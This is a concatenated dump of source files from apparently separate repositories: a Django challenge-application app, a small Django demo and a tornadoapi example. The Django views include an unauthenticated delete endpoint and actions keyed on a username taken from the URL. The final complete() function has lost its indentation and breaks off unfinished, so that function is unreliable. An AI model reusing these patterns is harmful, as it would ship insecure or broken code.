            context['usd']=user2
    for c in challenges:
        for a in ac:
            if str(a.challenge)==str(c.name) and str(a.user)==str(context['usr']):
                p=a.points
                appl=False
                break
    context['a']=appl
    context['p']=p
    return render(request,'basic_app/home.html',context)
@login_required
def acc(request,username):
    """Render the account management page for `username`."""
    user_list=User.objects.all()
    context={}
    # Linear scans comparing str() forms; see NOTE in home().
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_detail_list=UserDetail.objects.all()
    for user2 in user_detail_list:
        if str(user2)==str(username):
            context['usd']=user2
    return render(request,'basic_app/acc.html',context)
@login_required
def upload(request,username):
    """Replace (or set) the user's profile picture from a POSTed file,
    deleting the previous image file from disk if one exists."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_details_list=UserDetail.objects.all()
    for user2 in user_details_list:
        if str(user2)==str(username):
            context['usd']=user2
    # NOTE(review): only POST-with-file paths return a response; a GET or a
    # POST without files falls off the end and returns None (HTTP 500).
    if request.method=="POST":
        if len(request.FILES)!=0:
            img = request.FILES['pic']
            img_extension = os.path.splitext(img.name)[1]
            s=settings.MEDIA_ROOT
            s=os.path.join(s, 'profile_pics')
            if context['usd'].profile_pic:
                # Remove the old image file before saving the new one.
                c=str(context['usd'].profile_pic).split("/")[1]
                k=os.path.join(s,c)
                print("ghxc")
                if os.path.exists(k):
                    os.remove(k)
                context['usd'].profile_pic=request.FILES['pic']
                context['usd'].save()
                return render(request,'basic_app/acc.html',context)
            else:
                print("Image not there")
                context['usd'].profile_pic=request.FILES['pic']
                context['usd'].save()
                return render(request,'basic_app/acc.html',context)
@login_required
def save(request,username):
    """Update the user's email address from a POSTed form field."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_detail_list=UserDetail.objects.all()
    for user2 in user_detail_list:
        if str(user2)==str(username):
            context['usd']=user2
    if request.method=="POST":
        context['usr'].email=request.POST.get('email')
        context['usr'].save()
    return render(request,'basic_app/acc.html',context)
@login_required
def update(request,username):
    """Update the user's first/last name from POSTed 'fn'/'ln' fields."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_detail_list=UserDetail.objects.all()
    for user2 in user_detail_list:
        if str(user2)==str(username):
            context['usd']=user2
    if request.method=="POST":
        context['usr'].first_name=request.POST.get('fn')
        context['usr'].last_name=request.POST.get('ln')
        context['usr'].save()
    return render(request,'basic_app/acc.html',context)
@login_required
def change(request,username):
    """Change the user's password after verifying the old one ('op');
    rejects an unchanged password ('np' equal to 'op')."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_detail_list=UserDetail.objects.all()
    for user2 in user_detail_list:
        if str(user2)==str(username):
            context['usd']=user2
    if request.method=="POST":
        # Re-authenticate with the old password before allowing a change.
        user1=authenticate(username=username,password=request.POST.get('op'))
        if user1==None:
            context['er']=True
        else:
            if request.POST.get('op')==request.POST.get('np'):
                context['dm']=True
            else:
                # NOTE(review): set_password invalidates the current session
                # hash; consider update_session_auth_hash so the user stays
                # logged in after the change.
                context['usr'].set_password(request.POST.get('np'))
                context['usr'].save()
    return render(request,'basic_app/acc.html',context)
@login_required
def user_logout(request):
    """Log the current user out and return to the landing page."""
    logout(request)
    return redirect('/')
def index(request):
    """Render the landing page with a static owner name."""
    context = {'name': 'Saikat'}
    return render(request, 'basic_app/index.html', context)
def login_register(request):
    """Combined login/registration view.

    GET toggles between the login form ('?login=') and the registration
    form ('?reg=').  POST either registers a new user (validating an
    optional jpg/jpeg/png profile picture) or authenticates an existing
    one, routing admins and plain users to different dashboards.
    """
    show_div=False
    print(request.method)
    if request.GET.get('login'):
        show_div=False
    elif request.GET.get('reg'):
        show_div=True
    context={}
    context['error']=False
    user_form=UserForm(data=request.POST)
    user_detail_form=UserDetailForm(data=request.POST)
    user_detail1=UserDetail
    if request.method == "POST" and show_div:
        # Registration branch.
        print(user_form.is_valid())
        print(user_detail_form.is_valid())
        if user_form.is_valid() and user_detail_form.is_valid():
            user = user_form.save(commit=False)
            user.set_password(user.password)
            user_detail=user_detail_form.save(commit=False)
            user_detail.user=user
            if len(request.FILES)!=0:
                p=request.FILES['profile_pic']
                p=str(p)
                print(p)
                # Accept only common image extensions for the avatar.
                if p.endswith('.jpg') or p.endswith('.jpeg') or p.endswith('.png'):
                    user_detail.profile_pic=request.FILES['profile_pic']
                    user.save()
                    user_detail.save()
                    request.session['username']=user.username
                    login(request,user)
                    return redirect('/basic_app/home')
                else:
                    context['show_div']=True
                    context['user_form']=user_form
                    context['user_detail_form']=user_detail_form
                    context['warning']=True
                    return render(request,'basic_app/login.html',context)
            else:
                # No picture uploaded: register without one.
                user.save()
                user_detail.save()
                request.session['username']=user.username
                login(request,user)
                return redirect('/basic_app/home')
    elif request.method == "POST" and not show_div:
        # Login branch.
        username=request.POST.get('username')
        password=request.POST.get('password')
        user1=authenticate(username=username,password=password)
        if user1!=None:
            # Decide whether this account is a plain user or an admin by
            # scanning both profile tables.
            user_detail_list=UserDetail.objects.all()
            ef=False
            for user2 in user_detail_list:
                if str(user2)==str(user1):
                    ef=True
                    break
            user_admin_list=UserAdmin.objects.all()
            af=False
            for user2 in user_admin_list:
                if str(user2)==str(user1):
                    print(user2)
                    af=True
                    break
            request.session['username']=user1.username
            if af:
                u=str(user1)
                url = reverse('admin', kwargs={'username': u})
                print(url)
                login(request,user1)
                return HttpResponseRedirect(url)
            elif ef:
                u=str(user1)
                url = reverse('user', kwargs={'username': u})
                login(request,user1)
                return HttpResponseRedirect(url)
        else:
            context['error']=True
    context['user_form']=user_form
    context['user_detail_form']=user_detail_form
    context['show_div']=show_div
    return render(request,'basic_app/login.html',context)
@login_required
def show(request,username):
    """Show one challenge; `username` is a composite '<user>_<challenge>'
    path segment."""
    c_name=username.split('_')[1]
    print(c_name)
    username=username.split("_")[0]
    challenges=Challenges.objects.all()
    ac=AppliedChallenges.objects.all()
    appl=True
    context={}
    for c in challenges:
        if str(c)==c_name:
            context['ch']=c
    user_list=User.objects.all()
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_detail_list=UserDetail.objects.all()
    for user2 in user_detail_list:
        if str(user2)==str(username):
            context['usd']=user2
    # 'a' is False when the user has already applied to this challenge.
    for a in ac:
        if str(a.challenge)==str(context['ch']) and str(a.user)==str(context['usr']):
            appl=False
            break
    context['a']=appl
    return render(request,'basic_app/show.html',context)
@login_required
def apply(request,username):
    """Apply a user to a challenge; `username` is '<user>_<challenge>'.

    Increments the challenge's applicant count and records the
    application, but only if this user has not applied already.
    """
    print(username)
    u=username.split("_")[0]
    c=username.split("_")[1]
    a=AppliedChallenges()
    n=0
    challenges=Challenges.objects.all()
    for ca in challenges:
        if str(ca.name)==c:
            n=ca.applicant
            break
    n=n+1
    # Existing application check — prevents double-applying.
    l=AppliedChallenges.objects.filter(user=u).filter(challenge=c)
    if(len(l)==0):
        Challenges.objects.filter(pk=c).update(applicant=n)
        a.user=u
        a.challenge=c
        a.save()
    url = reverse('user', kwargs={'username': u})
    return HttpResponseRedirect(url)
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import UserAdmin,Challenges
# Register your models here.
# Expose the user_admin models in the Django admin site.
# NOTE(review): AppliedChallenges is not registered — confirm intentional.
admin.site.register(UserAdmin)
admin.site.register(Challenges)
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-19 18:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import user_admin.models
class Migration(migrations.Migration):
    """Initial user_admin schema: UserAdmin profile linked one-to-one to the
    auth User."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='UserAdmin',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('role', models.CharField(default='admin', max_length=128)),
                ('profile_pic', models.ImageField(blank=True, null=True, upload_to=user_admin.models.path_and_rename)),
                ('last_login', models.DateTimeField(blank=True, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 17:56
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the Challenges model, keyed by challenge name."""

    dependencies = [
        ('user_admin', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Challenges',
            fields=[
                ('name', models.CharField(max_length=255, primary_key=True, serialize=False)),
                ('technology', models.CharField(max_length=255)),
                ('account', models.CharField(max_length=255)),
                ('capability', models.CharField(max_length=255)),
                ('applicant_status', models.CharField(default='NOT FILLED', max_length=255)),
                ('date_posted', models.DateField(default=datetime.date.today)),
                ('expiry_date', models.DateField()),
                ('applicant', models.IntegerField(default=0)),
                ('manager', models.CharField(max_length=255)),
                ('owner', models.CharField(max_length=255)),
                ('desc', models.CharField(max_length=255)),
                ('points', models.IntegerField()),
                ('category', models.CharField(max_length=255)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:43
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make Challenges.applicant_status blankable with default 'NOT_FILLED'."""

    dependencies = [
        ('user_admin', '0002_challenges'),
    ]

    operations = [
        migrations.AlterField(
            model_name='challenges',
            name='applicant_status',
            field=models.CharField(blank=True, default='NOT_FILLED', max_length=255),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:45
from django.db import migrations, models
import user_admin.models
class Migration(migrations.Migration):
    """Switch applicant_status's default to the callable user_admin.models.o
    (which must therefore remain importable under that name)."""

    dependencies = [
        ('user_admin', '0003_auto_20200821_0413'),
    ]

    operations = [
        migrations.AlterField(
            model_name='challenges',
            name='applicant_status',
            field=models.CharField(default=user_admin.models.o, max_length=255),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Shrink applicant_status to a fixed 7-char non-editable field."""

    dependencies = [
        ('user_admin', '0004_auto_20200821_0415'),
    ]

    operations = [
        migrations.AlterField(
            model_name='challenges',
            name='applicant_status',
            field=models.CharField(default='0000000', editable=False, max_length=7),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:49
from django.db import migrations
class Migration(migrations.Migration):
    """Drop applicant_status entirely (re-added by 0007)."""

    dependencies = [
        ('user_admin', '0005_auto_20200821_0418'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='challenges',
            name='applicant_status',
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-21 06:50
from django.db import migrations, models
class Migration(migrations.Migration):
    """Re-add applicant_status as free text defaulting to 'NOT FILLED'."""

    dependencies = [
        ('user_admin', '0006_remove_challenges_applicant_status'),
    ]

    operations = [
        migrations.AddField(
            model_name='challenges',
            name='applicant_status',
            field=models.CharField(default='NOT FILLED', max_length=255),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create AppliedChallenges joining a user to a challenge (FK forms;
    later migrations flatten both to CharFields)."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('user_admin', '0007_challenges_applicant_status'),
    ]

    operations = [
        migrations.CreateModel(
            name='AppliedChallenges',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('completed', models.BooleanField(default=False)),
                ('points', models.IntegerField(default=0)),
                ('challenge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_admin.Challenges')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Tighten AppliedChallenges.challenge to a OneToOneField."""

    dependencies = [
        ('user_admin', '0008_appliedchallenges'),
    ]

    operations = [
        migrations.AlterField(
            model_name='appliedchallenges',
            name='challenge',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='user_admin.Challenges'),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Flatten AppliedChallenges.user and .challenge from relations to plain
    CharFields — referential integrity is no longer enforced by the DB."""

    dependencies = [
        ('user_admin', '0009_auto_20200823_1351'),
    ]

    operations = [
        migrations.AlterField(
            model_name='appliedchallenges',
            name='challenge',
            field=models.CharField(max_length=255),
        ),
        migrations.AlterField(
            model_name='appliedchallenges',
            name='user',
            field=models.CharField(max_length=255),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
import os
from uuid import uuid4
import datetime
def path_and_rename(instance, filename):
    """Build an upload path under profile_pics/.

    Saved instances are named after their primary key; unsaved ones get a
    random hex name.  The original file extension is preserved.
    """
    extension = filename.split('.')[-1]
    # Unsaved instances (falsy pk) get a random, collision-resistant name.
    stem = instance.pk if instance.pk else uuid4().hex
    return os.path.join('profile_pics', '{}.{}'.format(stem, extension))
# Create your models here.
def o():
    """Legacy default for Challenges.applicant_status.

    Still referenced by migration 0004 as ``user_admin.models.o`` — must
    not be renamed or removed.
    """
    return "NOT FILLED"
class UserAdmin(models.Model):
    """Admin-role profile attached one-to-one to the auth User; presence of
    a row here is what login routing treats as 'is an admin'."""
    user=models.OneToOneField(User,on_delete=models.CASCADE)
    role=models.CharField(max_length=128,default='admin')
    profile_pic=models.ImageField(upload_to=path_and_rename,blank=True,null=True)
    # Tracked separately from auth User.last_login.
    last_login = models.DateTimeField(blank=True,null=True)
    def __str__(self):
        return self.user.username
class Challenges(models.Model):
    """A posted challenge, keyed by its (unique) name.

    `applicant` is a running count incremented when users apply.
    """
    name=models.CharField(primary_key=True,max_length=255)
    technology=models.CharField(max_length=255)
    account=models.CharField(max_length=255)
    capability=models.CharField(max_length=255)
    applicant_status=models.CharField(max_length=255,default="NOT FILLED")
    date_posted=models.DateField(default=datetime.date.today)
    expiry_date=models.DateField()
    applicant=models.IntegerField(default=0)
    manager=models.CharField(max_length=255)
    owner=models.CharField(max_length=255)
    desc=models.CharField(max_length=255)
    points=models.IntegerField()
    category=models.CharField(max_length=255)
    def __str__(self):
        return self.name
class AppliedChallenges(models.Model):
    """Record of a user applying to a challenge.

    NOTE(review): user/challenge are plain strings, not foreign keys (see
    migration 0010), so referential integrity is not enforced by the DB.
    """
    user=models.CharField(max_length=255)
    challenge=models.CharField(max_length=255)
    completed=models.BooleanField(default=False)
    points=models.IntegerField(default=0)
    def __str__(self):
        return self.user+'_'+self.challenge
--- FILE SEPARATOR ---
from django.urls import path,include
from user_admin import views1
app_name='user_admin'

# Admin dashboard routes.  Several take a composite '<username>' segment
# ('<user>_<challenge>' for edit/show/delete/applicants/complete) which the
# views split themselves.
urlpatterns = [
    path('acc/<username>',views1.acc,name='acc'),
    path('upload/<username>',views1.upload,name='upload'),
    path('save/<username>',views1.save,name='save'),
    path('change/<username>',views1.change,name='change'),
    path('update/<username>',views1.update,name='update'),
    path('add/<username>',views1.add,name="add"),
    path('save_challenge/<username>',views1.save_challenge,name="save_challenge"),
    path('edit/<username>',views1.edit,name='edit'),
    path('show/<username>',views1.show,name='show'),
    path('delete/<username>',views1.delete,name='delete'),
    path('admin_logout/',views1.user_logout,name='admin_logout'),
    path('applicants/<username>',views1.applicants,name='applicants'),
    path('complete/<username>',views1.complete,name='complete')
]
--- FILE SEPARATOR ---
from django.shortcuts import render
from django.shortcuts import render,redirect
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import login
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate,login,logout
from django.urls import reverse
from basic_app.models import User,UserDetail
from user_admin.models import UserAdmin,Challenges,AppliedChallenges
from idil import settings
import os
import cv2
# Create your views here.
@login_required
def index(request,username):
    """Render the admin dashboard listing all challenges."""
    context={}
    print(username+'sjh')
    user_list=User.objects.all()
    challenges=Challenges.objects.all()
    context['challenges']=challenges
    # Linear scans comparing str() forms — presumably usernames are unique.
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    return render(request,'user_admin/index.html',context)
@login_required
def acc(request,username):
    """Render the admin account management page for `username`."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    return render(request,'user_admin/acc.html',context)
@login_required
def upload(request,username):
    """Replace (or set) the admin's profile picture from a POSTed file,
    deleting the previous image file from disk if one exists."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    # NOTE(review): only POST-with-file paths return a response; a GET or a
    # POST without files falls off the end and returns None (HTTP 500).
    if request.method=="POST":
        if len(request.FILES)!=0:
            img = request.FILES['pic']
            img_extension = os.path.splitext(img.name)[1]
            s=settings.MEDIA_ROOT
            s=os.path.join(s, 'profile_pics')
            if context['uad'].profile_pic:
                # Remove the old image file before saving the new one.
                c=str(context['uad'].profile_pic).split("/")[1]
                k=os.path.join(s,c)
                print("ghxc")
                if os.path.exists(k):
                    os.remove(k)
                context['uad'].profile_pic=request.FILES['pic']
                context['uad'].save()
                return render(request,'user_admin/acc.html',context)
            else:
                print("Image not there")
                context['uad'].profile_pic=request.FILES['pic']
                context['uad'].save()
                return render(request,'user_admin/acc.html',context)
@login_required
def save(request,username):
    """Update the admin's email address from a POSTed form field."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    if request.method=="POST":
        context['usr'].email=request.POST.get('email')
        context['usr'].save()
    return render(request,'user_admin/acc.html',context)
@login_required
def update(request,username):
    """Update the admin's first/last name from POSTed 'fn'/'ln' fields."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    if request.method=="POST":
        context['usr'].first_name=request.POST.get('fn')
        context['usr'].last_name=request.POST.get('ln')
        context['usr'].save()
    return render(request,'user_admin/acc.html',context)
@login_required
def change(request,username):
    """Change the admin's password after verifying the old one ('op');
    rejects an unchanged password ('np' equal to 'op')."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    if request.method=="POST":
        # Re-authenticate with the old password before allowing a change.
        user1=authenticate(username=username,password=request.POST.get('op'))
        if user1==None:
            context['er']=True
        else:
            if request.POST.get('op')==request.POST.get('np'):
                context['dm']=True
            else:
                # NOTE(review): set_password invalidates the current session
                # hash; consider update_session_auth_hash.
                context['usr'].set_password(request.POST.get('np'))
                context['usr'].save()
    return render(request,'user_admin/acc.html',context)
@login_required
def add(request,username):
    """Render the 'add challenge' form page for the admin `username`."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    return render(request,'user_admin/add.html',context)
@login_required
def save_challenge(request,username):
    """Create a Challenges row from the POSTed add-challenge form, then
    redirect back to the admin dashboard."""
    user_list=User.objects.all()
    context={}
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    if request.method=="POST":
        challange=Challenges()
        challange.name=request.POST.get('cn')
        challange.technology=request.POST.get('tech')
        challange.account=request.POST.get('acc')
        challange.capability=request.POST.get('cap')
        challange.applicant_status=request.POST.get('astat')
        challange.expiry_date=request.POST.get('edate')
        challange.category=request.POST.get('cat')
        challange.manager=request.POST.get('manager')
        challange.owner=request.POST.get('powner')
        challange.points=request.POST.get('points')
        challange.desc=request.POST.get('desc')
        # NOTE(review): this overwrites the 'astat' value read above —
        # applicant_status is always saved as "NOT FILLED".
        challange.applicant_status="NOT FILLED"
        challange.save()
    url = reverse('admin', kwargs={'username': username})
    return HttpResponseRedirect(url)
@login_required
def edit(request,username):
    """Edit a challenge; `username` is '<user>_<challenge>'.

    GET renders the edit form; POST rewrites every field of the matched
    challenge (keeping its original date_posted) and redirects back to the
    admin dashboard.
    """
    c_name=username.split('_')[1]
    username=username.split("_")[0]
    challenges=Challenges.objects.all()
    context={}
    k=Challenges()
    for c in challenges:
        if str(c)==c_name:
            context['ch']=c
            k=c
    user_list=User.objects.all()
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    if request.method=="POST":
        c = Challenges.objects.get(name=k.name)
        print("ed"+c.name)
        # NOTE(review): name is the primary key; changing it here creates a
        # new row on save rather than renaming — verify intended.
        c.name=request.POST.get('cn')
        c.technology=request.POST.get('tech')
        c.account=request.POST.get('acc')
        c.capability=request.POST.get('cap')
        c.applicant_status=request.POST.get('astat')
        c.expiry_date=request.POST.get('edate')
        c.category=request.POST.get('cat')
        c.manager=request.POST.get('manager')
        c.owner=request.POST.get('powner')
        c.points=request.POST.get('points')
        c.desc=request.POST.get('desc')
        c.date_posted=k.date_posted
        c.applicant=request.POST.get('applicant')
        c.save()
        url = reverse('admin', kwargs={'username': username})
        return HttpResponseRedirect(url)
    return render(request,'user_admin/edit.html',context)
def delete(request,username):
    """Delete a challenge; `username` is '<user>_<challenge>'.

    NOTE(review): unlike its siblings this view has no @login_required —
    confirm whether unauthenticated deletes are really intended.
    """
    c_name=username.split('_')[1]
    username=username.split("_")[0]
    challenges=Challenges.objects.all()
    for c in challenges:
        if str(c)==c_name:
            c.delete()
    url = reverse('admin', kwargs={'username': username})
    return HttpResponseRedirect(url)
@login_required
def show(request,username):
    """Show a single challenge to the admin; `username` is
    '<user>_<challenge>'."""
    c_name=username.split('_')[1]
    print(c_name)
    username=username.split("_")[0]
    challenges=Challenges.objects.all()
    context={}
    for c in challenges:
        if str(c)==c_name:
            context['ch']=c
    user_list=User.objects.all()
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
    return render(request,'user_admin/show.html',context)
@login_required
def user_logout(request):
    """Log the current admin out and return to the landing page."""
    logout(request)
    return redirect('/')
@login_required
def applicants(request,username):
    """List applicants for a challenge; `username` is '<user>_<challenge>'.

    Builds `e`, a mapping of applicant username -> completed flag, for the
    template.
    """
    c_name=username.split('_')[1]
    username=username.split("_")[0]
    challenges=Challenges.objects.all()
    context={}
    for c in challenges:
        if str(c)==c_name:
            context['ch']=c
            break
    user_list=User.objects.all()
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    user_admin_list=UserAdmin.objects.all()
    for user2 in user_admin_list:
        if str(user2)==str(username):
            context['uad']=user2
            break
    appl=AppliedChallenges.objects.filter(challenge=str(context['ch']))
    context['appls']=appl
    for a in appl:
        o=User.objects.filter(username=a.user)
        context['o']=o
    # NOTE(review): `o` only holds the LAST applicant's queryset and is
    # unbound (NameError) when there are no applicants — verify intended.
    h=[]
    e=dict()
    for i in o:
        a=AppliedChallenges.objects.filter(challenge=str(context['ch'])).filter(user=i.username)
        for r in a:
            e[i.username]=r.completed
            print(e[i.username])
    context['e']=e
    return render(request,'user_admin/applicants.html',context)
@login_required
def complete(request,username):
c_name=username.split('_')[1]
print(c_name)
username=username.split("_")[0]
challenges=Challenges.objects.all()
context={}
for c in challenges:
if str(c)==c_name:
context['ch']=c
break
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
break
|
[
"/idil/basic_app/forms.py",
"/idil/basic_app/migrations/0003_auto_20200817_2347.py",
"/idil/basic_app/migrations/0006_auto_20200819_2225.py",
"/idil/basic_app/models.py",
"/idil/basic_app/urls.py",
"/idil/basic_app/views.py",
"/idil/user_admin/admin.py",
"/idil/user_admin/migrations/0001_initial.py",
"/idil/user_admin/migrations/0002_challenges.py",
"/idil/user_admin/migrations/0003_auto_20200821_0413.py",
"/idil/user_admin/migrations/0004_auto_20200821_0415.py",
"/idil/user_admin/migrations/0005_auto_20200821_0418.py",
"/idil/user_admin/migrations/0006_remove_challenges_applicant_status.py",
"/idil/user_admin/migrations/0007_challenges_applicant_status.py",
"/idil/user_admin/migrations/0008_appliedchallenges.py",
"/idil/user_admin/migrations/0009_auto_20200823_1351.py",
"/idil/user_admin/migrations/0010_auto_20200823_1354.py",
"/idil/user_admin/models.py",
"/idil/user_admin/urls.py",
"/idil/user_admin/views1.py"
] |
007freddythomas/django
|
from django.contrib import admin
from django.urls import path

from .views import reguser

# URL routes for the manageuser app.
urlpatterns = [
    path('register', reguser),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def reguser(request):
    """Render a placeholder registration page.

    BUG FIX: the closing tag was written "<h1>" instead of "</h1>",
    leaving the heading element unclosed in the rendered HTML.
    """
    return HttpResponse("<h1>Registration Page</h1>")
--- FILE SEPARATOR ---
from django.contrib import admin
from django.urls import path

from .views import product

# URL routes for the product app.
urlpatterns = [
    path('product', product),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.template import loader
def product(request):
    """Render the hard-coded demo product through productinfo.html."""
    context = {
        "name": "VIVO",
        "desc": " Smart Phone",
        "price": 45555,
    }
    template = loader.get_template("productinfo.html")
    return HttpResponse(template.render(context, request))
|
[
"/manageuser/urls.py",
"/manageuser/views.py",
"/product/urls.py",
"/product/views.py"
] |
007gzs/tornadoapi-example
|
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
from tornadoapi import fields
from tornadoapi.conf import settings
from tornadoapi.core.err_code import ErrCode
from tornadoapi.core.exceptions import CustomError
from tornadoapi.handler import ApiHandler, ApiDocHandler
class BaseHandler(ApiHandler):
    """Common base for this API's handlers; answers CORS preflight requests."""
    def options(self, *args, **kwargs):
        # Reply to OPTIONS with an empty body (CORS preflight support —
        # the app config sends Access-Control-Allow-Origin: *).
        self.finish()
class TestHandler(BaseHandler):
    """Demo endpoint exercising tornadoapi field parsing and doc generation."""
    # Declarative request fields; the (Chinese) descriptions feed the
    # generated API documentation page.
    test_param = fields.CharField(description='测试参数', default=None)
    # raw_body=True: value is parsed from the raw request body as JSON.
    test_body = fields.JSONField(description='请求体测试', required=False, raw_body=True)
    test_choice = fields.ChoiceField(description='选择参数', default=None, choices=((0, '选项0'), (1, '选项1')))
    @classmethod
    def get_return_sample(cls):
        # Sample success payload shown in the generated docs.
        return ErrCode.SUCCESS.get_res_dict(data={'test_param': '测试参数', 'test_choice': '选择参数', 'title': '配置中TITLE'})
    @classmethod
    def get_handler_name(cls):
        # Display name for the docs page.
        return '测试'
    @classmethod
    def get_handler_remark(cls):
        return '测试 备注'
    @classmethod
    def get_handler_description(cls):
        return '测试 描述'
    def get(self, *args, **kwargs):
        """Echo the parsed fields back; a JSON body without an 'action'
        key raises ERR_ACTION_NOT_FOUND."""
        action = None
        if self.test_body and isinstance(self.test_body, dict):
            if 'action' not in self.test_body:
                raise CustomError(ErrCode.ERR_ACTION_NOT_FOUND)
            else:
                action = self.test_body['action']
        ret = {
            'test_param': self.test_param,
            'test_choice': self.test_choice,
            'body_action': action,
            'title': settings.TITLE
        }
        self.write_api(ret)
    # POST shares GET's implementation.
    post = get
# Routes exported by this module; consumed by app.TestApiApplication,
# which prefixes each pattern with the configured base_url.
# Tuple shape: (pattern, handler[, handler_kwargs[, display_name]]).
default_handlers = [
    (r'doc', ApiDocHandler),
    (r'test', TestHandler, {}, '测试'),
    (r'test/(?P<test_param>.*?)', TestHandler, {}, '测试url_param'),
]
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
from tornado import web
from tornadoapi.conf import settings
from tornadoapi.core import url_path_join
from tornadoapi.handler import NotFoundHandler
# Working directory captured at import time (NOTE(review): not referenced
# elsewhere in this file — confirm it is used by other modules).
base_dir = os.getcwd()
def load_handlers(name):
    """Import module *name* and return its ``default_handlers`` route list.

    Raises ImportError if the module is missing and AttributeError if it
    defines no ``default_handlers``.
    """
    # Local import keeps this fix self-contained; import_module is the
    # documented replacement for the awkward __import__/fromlist idiom.
    import importlib
    mod = importlib.import_module(name)
    return mod.default_handlers
class TestApiApplication(web.Application):
    """Tornado application that mounts api.handlers under the base URL."""

